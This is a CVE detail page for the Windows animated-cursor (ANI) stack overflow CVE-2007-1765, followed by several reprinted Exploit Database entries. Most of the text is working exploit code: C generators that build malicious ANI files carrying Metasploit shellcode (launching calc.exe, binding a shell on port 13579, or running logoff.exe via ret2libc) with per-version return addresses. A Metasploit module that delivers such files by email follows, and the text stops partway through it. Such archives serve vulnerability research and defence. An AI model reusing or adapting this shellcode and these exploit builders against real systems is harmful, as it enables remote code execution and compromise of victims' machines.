CVE-2007-1765 : Detail

CVE-2007-1765
9.4% V3 | Network
Published: 2007-03-29 22h00 +00:00
Updated: 2018-10-16 12h57 +00:00

CVE Description

Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.

CVE Information

Related Weaknesses

CWE-ID | Weakness Name | Source
CWE-Other | No information. | 

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 9.3 | | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of the others.

Exploit information

Exploit Database EDB-ID : 3684

Publication date : 2007-04-07 22h00 +00:00
Author : Marsu
EDB Verified : Yes

/****************************************************************************
 * MS Windows Explorer Unspecified .ANI File DoS
 *
 * Another .Ani bug that freezes Explorer if you open a folder that contains
 * a crafted file.
 *
 * Tested against Win XP SP2 FR.
 * Have Fun!
 *
 * Coded by Marsu <Marsupilamipowa@hotmail.fr>
 ****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
#include <string.h>   /* memset/memcpy */

unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00"
"\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00"
"\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00"
"\x00\x00\x03" // Change this last char to avoid crash
;

int main(int argc, char* argv[])
{
    FILE* anifile;
    char evilbuff[4000];

    printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n");
    printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n");
    if (argc != 2) {
        printf("[+] Usage: %s <file.ani>\n", argv[0]);
        return 0;
    }

    /* Header first, then filler up to 4000 bytes */
    memset(evilbuff, 'A', 4000);
    memcpy(evilbuff, Ani_headers, sizeof(Ani_headers) - 1);

    if ((anifile = fopen(argv[1], "wb")) == 0) {
        printf("[-] Unable to access file.\n");
        return 0;
    }
    fwrite(evilbuff, 1, 4000, anifile);
    fclose(anifile);
    printf("[+] Done. Have fun!\n");
    return 0;
}

// milw0rm.com [2007-04-08]
Exploit Database EDB-ID : 3647

Publication date : 2007-04-01 22h00 +00:00
Author : Marsu
EDB Verified : Yes

/***************************************************************************
 * MS Windows .ANI File Local Buffer Overflow
 *
 * Credits go to Trirat Puttaraksa cause his PoC inspired this source.
 * devcode's exploit didnt work for me, so I made my own.
 * This exploit launches calc.exe on a lot of app (Word, Winamp, etc...).
 *
 * Turn off DEP to get it work on Explorer.
 *
 * Tested against Win XP SP2 FR.
 * Have Fun!
 *
 * Coded by Marsu <Marsupilamipowa@hotmail.fr>
 ***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
#include <string.h>   /* memset/memcpy/strlen */

/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6"
"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68"
"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b"
"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01"
"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b"
"\x43\x45\x32\xe3";

unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x13\x03\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xff\xff\x00\x00\x09\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x04\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4c\x03\x00\x00\x00"
"\x00\x00\x00\x00\x54\x53\x49\x4c\x04\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6e\x69\x68\xff\xff\x00\x00";

int main(int argc, char* argv[])
{
    FILE* anifile;
    char evilbuff[66000];

    printf("[+] MS Windows .ANI File Buffer Overflow \n");
    printf("[+] Greetz to Trirat Puttaraksa\n");
    printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n");
    if (argc != 2) {
        printf("[+] Usage: %s <file.ani>\n", argv[0]);
        return 0;
    }

    memset(evilbuff, 'C', 66000);
    memcpy(evilbuff, Ani_headers, sizeof(Ani_headers) - 1);
    memcpy(evilbuff + 168, "\x7b\x1a\x80\x7c", 4); /* CALL ESI in Kernel32.dll */
    memcpy(evilbuff + 245, CalcShellcode, strlen((const char *)CalcShellcode));
    memset(evilbuff + 65623, 0, 1);

    if ((anifile = fopen(argv[1], "wb")) == 0) {
        printf("[-] Unable to access file.\n");
        return 0;
    }
    fwrite(evilbuff, 1, 65623, anifile);
    fclose(anifile);
    printf("[+] Done. Have fun!\n");
    return 0;
}

// milw0rm.com [2007-04-02]
Exploit Database EDB-ID : 3695

Publication date : 2007-04-08 22h00 +00:00
Author : Breno Silva Pinto
EDB Verified : Yes

/* .ANI exploit tested on Windows XP SP2 - Portuguese Shellcode port bind 13579 JMP ESP Addr - ntdll.dll Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna. Exploit coded listen sauna hits Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject Breno Silva Pinto bsilva[at]Sekure.org */ #include <stdio.h> #include <stdlib.h> #include <windows.h> unsigned char aniheader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; unsigned char Shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f" "\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a" "\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e" "\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4" "\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1" "\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99" "\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5" "\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b" "\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7" "\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3" "\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a" "\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e" "\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4" "\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed" "\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62" "\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8" 
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76" "\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7" "\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84" "\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a" "\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed" "\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85"; int main( int argc, char **argv ) { char Buffer[1024]; FILE *f; if ( argc < 2 ) { printf("usage %s <file.ani>\n",argv[0]); return 0; } memset( Buffer, 0x90, sizeof( Buffer ) ); memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 ); memcpy( Buffer + 168, "\xed\x1e\x94\x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha! memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 ); f = fopen( argv[1], "wb" ); if ( f == NULL ) { printf("Cannot create file\n"); return 0; } fwrite(Buffer, 1, 1024, f); fclose(f); printf(".ANI file created!\n"); return 0; } // milw0rm.com [2007-04-09]
Exploit Database EDB-ID : 3652

Publication date : 2007-04-02 22h00 +00:00
Author : devcode
EDB Verified : Yes

/*
 * version 0.5
 * Copyright (c) 2007 devcode
 *
 *
 * ^^ D E V C O D E ^^
 *
 * Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
 * [CVE-2007-1765]
 *
 *
 * Description:
 * A vulnerability has been identified in Microsoft Windows,
 * which could be exploited by remote attackers to take complete
 * control of an affected system. This issue is due to a stack overflow
 * error within the "LoadAniIcon()" [user32.dll] function when rendering
 * cursors, animated cursors or icons with a malformed header, which could
 * be exploited by remote attackers to execute arbitrary commands by
 * tricking a user into visiting a malicious web page or viewing an email
 * message containing a specially crafted ANI file.
 *
 * Hotfix/Patch:
 * None as of this time.
 *
 * Vulnerable systems:
 * Microsoft Windows 2000 Service Pack 4
 * Microsoft Windows XP Service Pack 2
 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
 * Microsoft Windows XP Professional x64 Edition
 * Microsoft Windows Server 2003
 * Microsoft Windows Server 2003 (Itanium)
 * Microsoft Windows Server 2003 Service Pack 1
 * Microsoft Windows Server 2003 Service Pack 1 (Itanium)
 * Microsoft Windows Server 2003 x64 Edition
 * Microsoft Windows Vista
 *
 * Microsoft Internet Explorer 6
 * Microsoft Internet Explorer 7
 *
 * Tested on:
 * Microsoft XP SP2 + DEP + Internet Explorer 6
 *
 * This is a PoC and was created for educational purposes only. The
 * author is not held responsible if this PoC does not work or is
 * used for any other purposes than the one stated above.
 *
 * Credit goes to HOD (if he/they exist :P) for the html. Works on
 * XP SP2 with Hardware DEP enabled, go figure.
 *
 * ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)
 *
 */
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* system("calc.exe"); */
char szExecute[] = "logoff.exe\x00";

unsigned char uszHtml[] =
"<html>"
"Microsoft Windows .ANI LoadAniIcon Exploit"
"<br>Copyright (c) 2007 devcode<br>"
"<style>"
"* {CURSOR: url(\"poc.ani\")}</style></head>"
"</html>";

/* Usage: ani.exe 1*/
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\t(0) Kernel32.dll (ExitProcess)\n"
"\t(1) Windows XP SP2 + DEP\n"
"\t(2) Windows 2003 Server\n"
"Usage: ani.exe <target>";

/* RET2LIBC attack */
typedef struct {
    const char *szTarget;
    /* kernel32.dll - set the proper stack frame
       LEA EBP, DWORD PTR SS:[ESP+10]
       SUB ESP, EAX
       PUSH EBX
       PUSH ESI
       PUSH EDI
       ....
       ....
       RETN */
    unsigned char uszRet[5];
    /* msvcrt.dll - system() */
    unsigned char uszMsvcrtCall[5];
} TARGET;

TARGET targets[] = {
    { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" },
    { "Windows XP SP2",             "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" },
    { "Windows 2003 Server",        "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" }
};

int main( int argc, char **argv )
{
    char szBuffer[1024];
    FILE *f;
    FARPROC pExitProcess;
    int t;

    if ( argc < 2 ) {
        printf("%s\n", szIntro );
        return 0;
    }

    /* Validate the target index before it is used to index targets[] */
    t = atoi( argv[1] );
    if ( t < 0 || t >= (int)( sizeof( targets ) / sizeof( targets[0] ) ) ) {
        printf("[-] Unknown target %d\n", t );
        return 0;
    }

    if ( t == 0 ) {
        printf("[+] Getting ExitProcess address...\n");
        pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" );
        if ( pExitProcess == NULL ) {
            printf("[-] Cannot get ExitProcess address\n");
            return 0;
        }
        /* target 0 is the ExitProcess entry of targets[] */
        memcpy( targets[0].uszRet, &pExitProcess, 4 );
    }

    printf("[+] Creating ANI header...\n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf("[+] Copying execution code...\n");
    memcpy( szBuffer + 168, targets[t].uszRet, 4 );
    memset( szBuffer + 136, 0, 4 );
    memset( szBuffer + 204, 0, 4 );
    szBuffer[136] = 0x6C;
    szBuffer[204] = 0x6C;
    memcpy( szBuffer + 196, targets[t].uszMsvcrtCall, 4 );
    memcpy( szBuffer + 200, targets[t].uszMsvcrtCall, 4 );
    memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );

    f = fopen( "poc.ani", "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create ani file\n");
        return 0;
    }
    fwrite( szBuffer, 1, 1024, f );
    fclose( f );
    printf("[+] .ANI file successfully created!\n");

    f = fopen( "poc.html", "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create html file\n");
        return 0;
    }
    /* sizeof - 1: do not write the terminating NUL into the HTML file */
    fwrite( uszHtml, 1, sizeof( uszHtml ) - 1, f );
    fclose( f );
    printf("[+] HTML file successfully created!\n");
    return 0;
}

// milw0rm.com [2007-04-03]
Exploit Database EDB-ID : 3617

Publication date : 2007-03-30 22h00 +00:00
Author : devcode
EDB Verified : Yes

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * For this to work on XP SP2 on explorer.exe, DEP has to be turned * off. 
* */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; /* Shellcode - metasploit exec calc.exe ^^ */ unsigned char uszShellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42"; char szIntro[] = "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" 
"\t\t\tdevcode (c) 2007\n" "[+] Targets:\n" "\t(1) Windows XP SP2\n" "\t(2) Kernel32.dll (ExitProcess)\n" "\t(3) Windows 2K SP4\n\n" "Usage: ani.exe <target> <file>"; typedef struct { const char *szTarget; unsigned char uszRet[5]; } TARGET; TARGET targets[] = { { "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */ { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90" }, /* ExitProcess */ { "Windows 2K SP4", "\x29\x4C\xE1\x77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 3 ) { printf("%s\n", szIntro ); return 0; } if ( atoi( argv[1] ) == 1 ) { printf("[+] Getting ExitProcess address...\n"); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address\n"); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header...\n"); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying shellcode...\n"); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); f = fopen( argv[2], "wb" ); if ( f == NULL ) { printf("[-] Cannot create file\n"); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created!\n"); return 0; } // milw0rm.com [2007-03-31]
Exploit Database EDB-ID : 16698

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability in the
        LoadAniIcon() function of USER32.dll. The flaw is triggered
        through Outlook Express by using the CURSOR style sheet
        directive to load a malicious .ANI file.

        This vulnerability was discovered by Alexander Sotirov of Determina
        and was rediscovered, in the wild, by McAfee.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',    # First version
          'skape',  # Vista support
        ],
      'Version'        => '$Revision: 10394 $',
      'References'     =>
        [
          ['MSB', 'MS07-017'],
          ['CVE', '2007-0038'],
          ['CVE', '2007-1765'],
          ['OSVDB', '33629'],
          ['BID', '23194'],
          ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'],
          ['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'],
          ['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'],
        ],
      'Stance'         => Msf::Exploit::Stance::Passive,
      'DefaultOptions' =>
        {
          # Cause internet explorer to exit after the code hits
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024 + (rand(1000)),
          'MinNops'  => 32,
          'Compat'   =>
            {
              'ConnectionType' => '-bind -find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          #
          # Use multiple cursor URLs to try all targets. This can result in
          # multiple, sequential sessions
          #
          [ 'Automatic', {} ],

          #
          # The following targets use call [ebx+4], just like the original exploit
          #

          # Partial overwrite doesn't work for Outlook Express
          [ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }],

          # Should work for all English XP SP2
          [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],

          # Supplied by Fabrice MOURRON <fab[at]revhosts.net>
          [ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],

          # Should work for English XP SP0/SP1
          [ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],

          # Should work for English 2000 SP0-SP4+
          [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],

          #
          # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
          # of the RIFF chunk itself. The length field of the RIFF chunk
          # tag contains a short jump into an embedded riff chunk that
          # makes a long relative jump into the actual payload.
          #
          [ 'Windows Vista user32.dll 6.0.6000.16386',
            {
              'Ret' => 0x700b,
              'Len' => 2,
              # On Vista, the pages that contain the RIFF are read-only.
              # In-place decoders cannot be used.
              'Payload' =>
                {
                  'EncoderType' => Msf::Encoder::Type::Raw
                }
            }
          ],

          #
          # Supplied by ramon[at]risesecurity.org
          #

          # call [ebx+4]
          [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
          [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
          [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],

          # call [esi+4]
          [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
          [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
        ],
      'DisclosureDate' => 'Mar 28 2007',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def exploit
    exts = ['bmp', 'wav', 'png', 'zip', 'tar']
    gext = exts[rand(exts.length)]
    name = rand_text_alpha(rand(10)+1) + ".#{gext}"

    anis = {}
    html =
      "<html><head><title>" +
      rand_text_alphanumeric(rand(128)+4) +
      "</title>" +
      "</head><body>" +
      rand_text_alphanumeric(rand(128)+1)

    mytargs = (target.name =~ /Automatic/) ? targets : [target]

    if target.name =~ /Automatic/
      targets.each_index { |i|
        next if not targets[i].ret
        acid = generate_cid
        html << generate_div("cid:#{acid}")

        # Re-generate the payload, using the explicit target
        return if ((p = regenerate_payload(nil, nil, targets[i])) == nil)

        # Generate an ANI file for this target
        anis[acid] = generate_ani(p, targets[i])
      }
    else
      acid = generate_cid
      html << generate_div("cid:#{acid}")

      # Re-generate the payload, using the explicit target
      return if ((p = regenerate_payload(nil, nil, target)) == nil)

      # Generate an ANI file for this target
      anis[acid] = generate_ani(p, target)
    end

    html << "</body></html>"

    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    msg.add_part(Rex::Text.encode_base64(html, "\r\n"), "text/html", "base64", "inline")

    anis.each_pair do |cid,ani|
      part = msg.add_part_attachment(ani, cid + "." + gext)
      part.header.set("Content-ID", "<"+cid+">")
    end

    send_message(msg.to_s)
    print_status("Waiting for a payload session (backgrounding)...")
  end

  def generate_cid
    rand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8)
  end

  def generate_div(url)
    "<div style='" +
      generate_css_padding() +
      Rex::Text.to_rand_case("cursor") +
      generate_css_padding() +
      ":" +
      generate_css_padding() +
      Rex::Text.to_rand_case("url(") +
      generate_css_padding() +
      "\"#{url}\"" +
      generate_css_padding() +
      ");" +
      generate_css_padding() +
      "'>" +
      generate_padding() +
      "</div>"
  end

  def generate_ani(payload, target)
    # Build the first ANI header
    anih_a =
      [
        36,             # DWORD cbSizeof
        rand(128)+16,   # DWORD cFrames
        rand(1024)+1,   # DWORD cSteps
        0,              # DWORD cx,cy (reserved - 0)
        0,              # DWORD cBitCount, cPlanes (reserved - 0)
        0,
        0,
        0,              # JIF jifRate
        1               # DWORD flags
      ].pack('V9')

    anih_b = nil

    if (target.name =~ /Vista/)
      # Vista has ebp=80, eip=84
      anih_b = rand_text(84)

      # Patch local variables and loop counters
      anih_b[68, 12] = [0].pack("V") * 3
    else
      # XP/2K has ebp=76 and eip=80
      anih_b = rand_text(80)

      # Patch local variables and loop counters
      anih_b[64, 12] = [0].pack("V") * 3
    end

    # Overwrite the return with address of a "call ptr [ebx+4]"
